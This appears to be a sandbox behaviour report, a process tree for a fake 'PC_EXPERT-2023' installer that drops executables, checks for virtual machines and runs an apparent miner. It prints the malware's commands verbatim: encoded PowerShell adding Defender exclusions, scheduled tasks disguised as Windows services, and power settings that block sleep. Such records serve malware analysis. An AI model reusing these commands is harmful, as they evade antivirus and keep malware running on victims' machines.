C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5864 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3376 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2188 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5760 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5924 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1368 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6076 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5488 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5964 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5968 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\WinRAR\WinRAR.exe"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\Admin\Downloads\PC_EXPERT-2023.rar"2⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2168 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4776 /prefetch:82⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x3781⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Desktop\PC_EXPERT-2023\File-Set-Up_PC.exe"C:\Users\Admin\Desktop\PC_EXPERT-2023\File-Set-Up_PC.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\4w6x1TqK.exe"C:\Users\Admin\AppData\Roaming\4w6x1TqK.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C powershell -EncodedCommand "PAAjAGQAMQBnACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcwBRACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAEsAdQBRAEYAbwBIAE8AagBqAHYASgBGACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjADAAegBMAGoAeQAjAD4A"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGQAMQBnACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcwBRACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAEsAdQBRAEYAbwBIAE8AagBqAHYASgBGACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjADAAegBMAGoAeQAjAD4A"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\Dllhost\dllhost.exe"C:\ProgramData\Dllhost\dllhost.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json5⤵
-
C:\Windows\SysWOW64\chcp.comchcp 12516⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json5⤵
-
C:\Windows\SysWOW64\chcp.comchcp 12516⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json5⤵
-
C:\Windows\SysWOW64\chcp.comchcp 12516⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json5⤵
-
C:\Windows\SysWOW64\chcp.comchcp 12516⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json5⤵
-
C:\Windows\SysWOW64\chcp.comchcp 12516⤵
-
C:\ProgramData\Dllhost\winlogson.exeC:\ProgramData\Dllhost\winlogson.exe -c config.json6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json5⤵
-
C:\Windows\SysWOW64\chcp.comchcp 12516⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json5⤵
-
C:\Windows\SysWOW64\chcp.comchcp 12516⤵
-
C:\ProgramData\Dllhost\winlogson.exeC:\ProgramData\Dllhost\winlogson.exe -c config.json6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C echo ШюYьбгЩoF7mЧw1Чtc & SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo JbaлZFцуЪцD4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C echo BЯх5ЧfEдbЮ7 & SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo 8сj64pPм44⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C echo Р & SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ПuQtCBмN4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C echo яGvTт8ЛЖUхKгнuиve & SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo т4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C echo нpq & SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C echo KuфГ2Дnьл2НkцыА & SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ЮпБytБ4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C echo Rщ & SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo py4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C powershell -EncodedCommand "PAAjAEEEeAAlBCMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAFQQuBFYAJwRUAEoASAAvBFEAaQBOBBkEZgA/BDQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAEUAHQRsAG0ARAA7BCMAPgAgAEAAKAAgADwAIwBkAEYARQBOABUEFAQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAIQRGABwEcgBMBEsEOQRZAD4EUgAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMASAApBBYEWQBLBEMEOQRNBBsEHgQUBG0AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAOARyAEEEUwBBBG8AIgQ4AGMAGQRwADkEIwA+AA=="4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAEEEeAAlBCMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAFQQuBFYAJwRUAEoASAAvBFEAaQBOBBkEZgA/BDQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAEUAHQRsAG0ARAA7BCMAPgAgAEAAKAAgADwAIwBkAEYARQBOABUEFAQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAIQRGABwEcgBMBEsEOQRZAD4EUgAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMASAApBBYEWQBLBEMEOQRNBBsEHgQUBG0AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAOARyAEEEUwBBBG8AIgQ4AGMAGQRwADkEIwA+AA=="5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C echo ъЕи & SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo 14⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C powershell -EncodedCommand "PAAjADQESgAoBBIEQQRJAEoEMAA2BHEAQgAfBEMAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEkERABzAEkAHwQ0ABYEcQAiBEIAYgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMATARhAHoASAAnBGsAbgBYACgEIwA+ACAAQAAoACAAPAAjADwEGgRmAFQARAA3ADkEdABHACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwAZBBAEdQAyBCIEIQRaADQAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAHMAJQQ7BEcEMQQrBDAANgASBEkAHQRwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjABQEZAA1BFUAQwBDBEIAMwA+BCkEIwA+AA=="4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjADQESgAoBBIEQQRJAEoEMAA2BHEAQgAfBEMAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEkERABzAEkAHwQ0ABYEcQAiBEIAYgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMATARhAHoASAAnBGsAbgBYACgEIwA+ACAAQAAoACAAPAAjADwEGgRmAFQARAA3ADkEdABHACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwAZBBAEdQAyBCIEIQRaADQAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAHMAJQQ7BEcEMQQrBDAANgASBEkAHQRwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjABQEZAA1BFUAQwBDBEIAMwA+BCkEIwA+AA=="5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C powershell -EncodedCommand "PAAjAEMEFQQrBCQERARMAC4ETQQ0BDQENAQ4BGgAbABNACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAKQRiAEAEHwQ3AFYAcQAYBHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjADIEQgQbBCMAPgAgAEAAKAAgADwAIwBMAEMEYwBPBHcAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAGEARQQQBDcESgBwADYAGARHAE8ANgBKAC0EYQBaACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBhAC8EOQRxADQEHgQ4BEMEIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMASQAaBDEAVAByAEcEVgAUBFMAQwREACMAPgA="4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAEMEFQQrBCQERARMAC4ETQQ0BDQENAQ4BGgAbABNACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAKQRiAEAEHwQ3AFYAcQAYBHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjADIEQgQbBCMAPgAgAEAAKAAgADwAIwBMAEMEYwBPBHcAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAGEARQQQBDcESgBwADYAGARHAE8ANgBKAC0EYQBaACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBhAC8EOQRxADQEHgQ4BEMEIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMASQAaBDEAVAByAEcEVgAUBFMAQwREACMAPgA="5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C powershell -EncodedCommand "PAAjAGgASwRSACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdgA8BCkEMARQABMEHgQXBBIERgRrAHgAZgBMACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwAQBFQAIAQjAD4AIABAACgAIAA8ACMAUwBlACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBvAEAEawBVADcEOQR2AEsAJwRRACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBCADgAeQAeBCMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFQAOAAfBEsEOQRABDIEeAAQBGcAWQBVABUEdwAjAD4A"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGgASwRSACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdgA8BCkEMARQABMEHgQXBBIERgRrAHgAZgBMACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwAQBFQAIAQjAD4AIABAACgAIAA8ACMAUwBlACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBvAEAEawBVADcEOQR2AEsAJwRRACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBCADgAeQAeBCMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFQAOAAfBEsEOQRABDIEeAAQBGcAWQBVABUEdwAjAD4A"5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C powershell -EncodedCommand "PAAjABsEGwQrBBMEJARzABkEVgAiBCUEVwBABDsEIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwApBG8AYgA8BGYAdABCADIASgQbBHMAOAQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAVgBFAEUAaAATBBQEKAQwBEQEIwA+ACAAQAAoACAAPAAjAG4AZwAmBFIAUwAxBE0ATgBMBGYAVwB0AFUAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAGcAawAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMANwQ3AE8AIQQ0BHIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAVgBxAEwEIwRKBEwEJARvAEIASwAjAD4A"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjABsEGwQrBBMEJARzABkEVgAiBCUEVwBABDsEIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwApBG8AYgA8BGYAdABCADIASgQbBHMAOAQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAVgBFAEUAaAATBBQEKAQwBEQEIwA+ACAAQAAoACAAPAAjAG4AZwAmBFIAUwAxBE0ATgBMBGYAVwB0AFUAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAGcAawAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMANwQ3AE8AIQQ0BHIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAVgBxAEwEIwRKBEwEJARvAEIASwAjAD4A"5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & echo ЮПхфxеМCYдх & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ЙfЗЗЖЬ6кк834⤵
-
C:\Windows\SysWOW64\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
-
C:\Windows\SysWOW64\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\powercfg.exepowercfg /hibernate off5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f5⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\8ZmsaNu9.exe"C:\Users\Admin\AppData\Local\Temp\8ZmsaNu9.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\ouicztmm.exe"C:\Users\Admin\AppData\Roaming\ouicztmm.exe"2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\DFpAnk0w.exe"C:\Users\Admin\AppData\Roaming\DFpAnk0w.exe"2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Desktop\PC_EXPERT-2023\File-Set-Up_PC.exe"C:\Users\Admin\Desktop\PC_EXPERT-2023\File-Set-Up_PC.exe"1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
